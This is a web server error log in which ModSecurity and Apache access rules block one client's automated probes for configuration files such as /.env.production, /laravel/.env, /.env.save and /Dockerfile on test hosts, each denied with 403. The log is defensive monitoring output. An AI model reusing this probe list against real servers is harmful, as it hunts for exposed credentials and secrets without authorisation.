[Mon Jan 12 12:28:22.587602 2026] [:error] [pid 1362233] [client 13.40.27.204:42558] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWTa1n2DuVtAKraH1YONZgAAAAk"]
[Mon Jan 12 12:28:22.587766 2026] [:error] [pid 1362233] [client 13.40.27.204:42558] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWTa1n2DuVtAKraH1YONZgAAAAk"]
[Mon Jan 12 12:28:22.688888 2026] [:error] [pid 1355925] [client 13.40.27.204:42586] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWTa1k7thAymmecRvtl0LgAAAAI"]
[Mon Jan 12 12:28:22.689095 2026] [:error] [pid 1355925] [client 13.40.27.204:42586] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWTa1k7thAymmecRvtl0LgAAAAI"]
[Mon Jan 12 12:28:22.689252 2026] [:error] [pid 1355925] [client 13.40.27.204:42586] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWTa1k7thAymmecRvtl0LgAAAAI"]
[Mon Jan 12 12:28:22.787653 2026] [:error] [pid 1355924] [client 13.40.27.204:42614] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWTa1tIpinFXoPzDav5wVAAAAAE"]
[Mon Jan 12 12:28:22.787852 2026] [:error] [pid 1355924] [client 13.40.27.204:42614] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWTa1tIpinFXoPzDav5wVAAAAAE"]
[Mon Jan 12 12:28:22.788017 2026] [:error] [pid 1355924] [client 13.40.27.204:42614] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWTa1tIpinFXoPzDav5wVAAAAAE"]
[Mon Jan 12 12:28:22.887877 2026] [:error] [pid 1365300] [client 13.40.27.204:42644] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWTa1tlKlmIJBGbQbR78RQAAAAs"]
[Mon Jan 12 12:28:22.888075 2026] [:error] [pid 1365300] [client 13.40.27.204:42644] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWTa1tlKlmIJBGbQbR78RQAAAAs"]
[Mon Jan 12 12:28:22.888218 2026] [:error] [pid 1365300] [client 13.40.27.204:42644] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWTa1tlKlmIJBGbQbR78RQAAAAs"]
[Mon Jan 12 12:28:23.078152 2026] [:error] [pid 1362231] [client 13.40.27.204:42708] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWTa18uCkgRo958sQERiBQAAAAc"]
[Mon Jan 12 12:28:23.078367 2026] [:error] [pid 1362231] [client 13.40.27.204:42708] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWTa18uCkgRo958sQERiBQAAAAc"]
[Mon Jan 12 12:28:23.078559 2026] [:error] [pid 1362231] [client 13.40.27.204:42708] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWTa18uCkgRo958sQERiBQAAAAc"]
[Mon Jan 12 12:28:23.181257 2026] [authz_core:error] [pid 1356126] [client 13.40.27.204:42734] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Mon Jan 12 12:28:23.280603 2026] [:error] [pid 1355923] [client 13.40.27.204:42770] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWTa1yE1xEBhFyXickXrcwAAAAA"]
[Mon Jan 12 12:28:23.280803 2026] [:error] [pid 1355923] [client 13.40.27.204:42770] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWTa1yE1xEBhFyXickXrcwAAAAA"]
[Mon Jan 12 12:28:23.280955 2026] [:error] [pid 1355923] [client 13.40.27.204:42770] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWTa1yE1xEBhFyXickXrcwAAAAA"]
[Mon Jan 12 12:28:23.382189 2026] [:error] [pid 1355926] [client 13.40.27.204:42800] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWTa18C2y5bYy1r2HoPzCgAAAAM"]
[Mon Jan 12 12:28:23.382481 2026] [:error] [pid 1355926] [client 13.40.27.204:42800] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWTa18C2y5bYy1r2HoPzCgAAAAM"]
[Mon Jan 12 12:28:23.382666 2026] [:error] [pid 1355926] [client 13.40.27.204:42800] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWTa18C2y5bYy1r2HoPzCgAAAAM"]
[Mon Jan 12 12:28:23.476610 2026] [authz_core:error] [pid 1362233] [client 13.40.27.204:42830] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Mon Jan 12 12:28:23.577639 2026] [:error] [pid 1355925] [client 13.40.27.204:42858] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWTa107thAymmecRvtl0LwAAAAI"]
[Mon Jan 12 12:28:23.577957 2026] [:error] [pid 1355925] [client 13.40.27.204:42858] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWTa107thAymmecRvtl0LwAAAAI"]
[Mon Jan 12 12:28:23.578206 2026] [:error] [pid 1355925] [client 13.40.27.204:42858] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWTa107thAymmecRvtl0LwAAAAI"]
[Mon Jan 12 12:28:23.675562 2026] [:error] [pid 1355924] [client 13.40.27.204:42888] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWTa19IpinFXoPzDav5wVQAAAAE"]
[Mon Jan 12 12:28:23.675759 2026] [:error] [pid 1355924] [client 13.40.27.204:42888] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWTa19IpinFXoPzDav5wVQAAAAE"]
[Mon Jan 12 12:28:23.675904 2026] [:error] [pid 1355924] [client 13.40.27.204:42888] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWTa19IpinFXoPzDav5wVQAAAAE"]
[Mon Jan 12 12:28:23.769216 2026] [:error] [pid 1365300] [client 13.40.27.204:42914] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aWTa19lKlmIJBGbQbR78RgAAAAs"]
[Mon Jan 12 12:28:23.769413 2026] [:error] [pid 1365300] [client 13.40.27.204:42914] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aWTa19lKlmIJBGbQbR78RgAAAAs"]
[Mon Jan 12 12:28:23.769562 2026] [:error] [pid 1365300] [client 13.40.27.204:42914] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aWTa19lKlmIJBGbQbR78RgAAAAs"]
[Mon Jan 12 12:28:23.870956 2026] [:error] [pid 1358564] [client 13.40.27.204:42944] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWTa1x_UgGRJ4jDk47tQWwAAAAY"]
[Mon Jan 12 12:28:23.871168 2026] [:error] [pid 1358564] [client 13.40.27.204:42944] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWTa1x_UgGRJ4jDk47tQWwAAAAY"]
[Mon Jan 12 12:28:23.871348 2026] [:error] [pid 1358564] [client 13.40.27.204:42944] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWTa1x_UgGRJ4jDk47tQWwAAAAY"]
[Mon Jan 12 12:28:23.970067 2026] [:error] [pid 1362231] [client 13.40.27.204:42974] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWTa18uCkgRo958sQERiBgAAAAc"]
[Mon Jan 12 12:28:23.970283 2026] [:error] [pid 1362231] [client 13.40.27.204:42974] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWTa18uCkgRo958sQERiBgAAAAc"]
[Mon Jan 12 12:28:23.970477 2026] [:error] [pid 1362231] [client 13.40.27.204:42974] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWTa18uCkgRo958sQERiBgAAAAc"]
[Mon Jan 12 12:28:24.077609 2026] [:error] [pid 1356126] [client 13.40.27.204:43000] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWTa2Dv8xyMiuvwfNnljwAAAAAU"]
[Mon Jan 12 12:28:24.077808 2026] [:error] [pid 1356126] [client 13.40.27.204:43000] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWTa2Dv8xyMiuvwfNnljwAAAAAU"]
[Mon Jan 12 12:28:24.077959 2026] [:error] [pid 1356126] [client 13.40.27.204:43000] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWTa2Dv8xyMiuvwfNnljwAAAAAU"]
[Mon Jan 12 12:28:24.175730 2026] [:error] [pid 1355923] [client 13.40.27.204:43050] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWTa2CE1xEBhFyXickXrdAAAAAA"]
[Mon Jan 12 12:28:24.175915 2026] [:error] [pid 1355923] [client 13.40.27.204:43050] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWTa2CE1xEBhFyXickXrdAAAAAA"]
